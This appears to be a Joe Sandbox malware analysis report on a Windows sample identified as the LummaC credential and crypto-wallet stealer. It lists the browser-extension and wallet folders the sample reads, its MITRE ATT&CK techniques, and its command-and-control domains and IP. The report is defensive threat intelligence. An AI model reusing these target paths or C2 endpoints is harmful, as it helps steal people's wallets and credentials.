Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6884, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 6884, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	11 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	3%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
palmeventeryjusk.shop	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://support.microsof	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
http://www.remobjects.com/ps	0%	URL Reputation	safe
palmeventeryjusk.shop	0%	Avira URL Cloud	safe
https://palmeventeryjusk.shop/apimiga	0%	Avira URL Cloud	safe
http://www.innosetup.com/	0%	Avira URL Cloud	safe
https://palmeventeryjusk.shop/K	0%	Avira URL Cloud	safe
pushjellysingeywus.shop	100%	Avira URL Cloud	malware
bordersoarmanusjuw.shop	100%	Avira URL Cloud	malware
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
palmeventeryjusk.shop	1%	Virustotal		Browse
economicscreateojsu.shop	100%	Avira URL Cloud	malware
http://www.innosetup.com/	2%	Virustotal		Browse
wifeplasterbakewis.shop	100%	Avira URL Cloud	malware
https://palmeventeryjusk.shop/01(P.	0%	Avira URL Cloud	safe
https://palmeventeryjusk.shop/api-	0%	Avira URL Cloud	safe
https://palmeventeryjusk.shop/g	0%	Avira URL Cloud	safe
bordersoarmanusjuw.shop	2%	Virustotal		Browse
economicscreateojsu.shop	13%	Virustotal		Browse
wifeplasterbakewis.shop	2%	Virustotal		Browse
https://palmeventeryjusk.shop/apiE0	0%	Avira URL Cloud	safe
https://palmeventeryjusk.shop/api	0%	Avira URL Cloud	safe
https://palmeventeryjusk.shop:443/api	0%	Avira URL Cloud	safe
https://palmeventeryjusk.shop/	0%	Avira URL Cloud	safe
https://palmeventeryjusk.shop/api	13%	Virustotal		Browse
pushjellysingeywus.shop	2%	Virustotal		Browse
entitlementappwo.shop	100%	Avira URL Cloud	malware
suitcaseacanehalk.shop	100%	Avira URL Cloud	malware
mealplayerpreceodsju.shop	100%	Avira URL Cloud	malware
https://palmeventeryjusk.shop:443/api	13%	Virustotal		Browse
absentconvicsjawun.shop	100%	Avira URL Cloud	malware
suitcaseacanehalk.shop	2%	Virustotal		Browse
https://palmeventeryjusk.shop/=	0%	Avira URL Cloud	safe
entitlementappwo.shop	17%	Virustotal		Browse
absentconvicsjawun.shop	18%	Virustotal		Browse
mealplayerpreceodsju.shop	18%	Virustotal		Browse
https://palmeventeryjusk.shop/	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
google.com	142.250.80.14	true	false		high
palmeventeryjusk.shop	172.67.155.93	true	true	1%, Virustotal, Browse	unknown
www.google.com	142.251.32.100	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
pushjellysingeywus.shop	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
palmeventeryjusk.shop	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/async/newtab_promos	false		high
bordersoarmanusjuw.shop	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
economicscreateojsu.shop	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
wifeplasterbakewis.shop	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgSaEMC5GMvBs7EGIjBUDjoZOZwbbYOebWZ9rjzg1pIVUtCKWFvTZJyTatG-di6-kWgVSkMk4x6uhc1VAKAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://palmeventeryjusk.shop/api	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMvBs7EGIjCXTsQ7Hz4Kgfi-FiRAT51_6pwZM6lLrAZbawdcw8AX8hoRf91oiReOlMqAgZsqCfUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
suitcaseacanehalk.shop	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
entitlementappwo.shop	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
mealplayerpreceodsju.shop	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
absentconvicsjawun.shop	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	file.exe	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false		high
https://palmeventeryjusk.shop/K	file.exe, 00000000.00000002.2025815738.000000000080F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024507652.000000000080A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://palmeventeryjusk.shop/apimiga	file.exe, 00000000.00000003.1946339615.0000000000807000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, 00000000.00000003.1937812498.0000000003216000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1937619765.0000000003241000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1937812498.0000000003216000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1937619765.0000000003241000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.1956069685.000000000332B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://palmeventeryjusk.shop/01(P.	file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024629586.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2025485076.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946339615.00000000007D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://palmeventeryjusk.shop/api-	file.exe, 00000000.00000003.1946746627.000000000080F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946339615.000000000080F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false		high
https://palmeventeryjusk.shop/g	file.exe, 00000000.00000003.1937668172.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946339615.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938933430.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	file.exe, 00000000.00000003.1937812498.00000000031F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	file.exe, 00000000.00000003.1937619765.0000000003241000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://palmeventeryjusk.shop/apiE0	file.exe, 00000000.00000002.2025769616.0000000000808000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024606062.0000000000804000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.1955322058.0000000003229000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://palmeventeryjusk.shop:443/api	file.exe, 00000000.00000002.2025282303.0000000000794000.00000004.00000020.00020000.00000000.sdmp	false	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://palmeventeryjusk.shop/	file.exe, 00000000.00000003.2024507652.000000000080A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946746627.000000000080F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024629586.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2025485076.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1946339615.0000000000812000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.remobjects.com/ps	file.exe	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	file.exe, 00000000.00000003.1937812498.00000000031F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.1956069685.000000000332B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1937919553.000000000323B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1938232220.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false		high
https://palmeventeryjusk.shop/=	file.exe, 00000000.00000002.2025815738.000000000080F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2024507652.000000000080A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.251.32.100	www.google.com	United States	15169	GOOGLEUS	false
142.250.80.100	unknown	United States	15169	GOOGLEUS	false
172.67.155.93	palmeventeryjusk.shop	United States	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432518
Start date and time:	2024-04-27 13:25:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@30/0@10/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 32 Number of non-executed functions: 104
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.40.238, 142.251.111.84, 142.251.41.3, 34.104.35.123, 23.206.121.28, 192.229.211.108, 142.250.65.227, 142.251.41.14
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:26:24	API Interceptor	7x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	Triglock.exe	Get hash	malicious	BitCoin Miner, SilentXMRMiner	Browse
	2.exe	Get hash	malicious	Unknown	Browse
	launcher.jar	Get hash	malicious	Unknown	Browse
	launcher.jar	Get hash	malicious	Discord Token Stealer	Browse
	SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.SpywareX-gen.20761.26247.dll	Get hash	malicious	Unknown	Browse
	TNQTc6Qmkg.exe	Get hash	malicious	Mars Stealer, RedLine, SectopRAT, Stealc, Vidar	Browse
	https://thehitchhouse.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://friwin2.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse
	https://pub-12c79d09670f4464af9de32e4799a256.r2.dev/12345.html	Get hash	malicious	HTMLPhisher	Browse
172.67.155.93	8Sb3Ng0nF3.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
google.com	Triglock.exe	Get hash	malicious	BitCoin Miner, SilentXMRMiner	Browse	142.251.35.164
	2.exe	Get hash	malicious	Unknown	Browse	142.250.65.196
	launcher.jar	Get hash	malicious	Unknown	Browse	142.251.32.100
	launcher.jar	Get hash	malicious	Discord Token Stealer	Browse	142.251.40.132
	SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll	Get hash	malicious	Unknown	Browse	142.251.32.100
	SecuriteInfo.com.Win32.SpywareX-gen.20761.26247.dll	Get hash	malicious	Unknown	Browse	142.251.40.132
	TNQTc6Qmkg.exe	Get hash	malicious	Mars Stealer, RedLine, SectopRAT, Stealc, Vidar	Browse	142.251.32.100
	https://thehitchhouse.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	142.251.41.4
	https://friwin2.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	142.251.41.4
	https://pub-12c79d09670f4464af9de32e4799a256.r2.dev/12345.html	Get hash	malicious	HTMLPhisher	Browse	142.250.80.100
palmeventeryjusk.shop	8Sb3Ng0nF3.exe	Get hash	malicious	LummaC	Browse	172.67.155.93
	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.93
	SecuriteInfo.com.Variant.Zusy.544534.13597.24264.exe	Get hash	malicious	LummaC	Browse	104.21.7.13
	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.93

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.16.225
	ReturnLegend.exe	Get hash	malicious	Stealit	Browse	104.26.13.205
	launcher.jar	Get hash	malicious	Unknown	Browse	162.159.137.232
	launcher.jar	Get hash	malicious	Discord Token Stealer	Browse	162.159.136.232
	YLICY3GBmX.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.90.190
	GcOeQTPzrh.elf	Get hash	malicious	Unknown	Browse	104.26.190.2
	RDFchOT4i0.exe	Get hash	malicious	Unknown	Browse	172.67.181.9
	https://thehitchhouse.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://friwin2.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	172.67.38.66
	https://pub-12c79d09670f4464af9de32e4799a256.r2.dev/12345.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	Triglock.exe	Get hash	malicious	BitCoin Miner, SilentXMRMiner	Browse	23.51.58.94 20.12.23.50
	2.exe	Get hash	malicious	Unknown	Browse	23.51.58.94 20.12.23.50
	launcher.jar	Get hash	malicious	Unknown	Browse	23.51.58.94 20.12.23.50
	launcher.jar	Get hash	malicious	Discord Token Stealer	Browse	23.51.58.94 20.12.23.50
	SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll	Get hash	malicious	Unknown	Browse	23.51.58.94 20.12.23.50
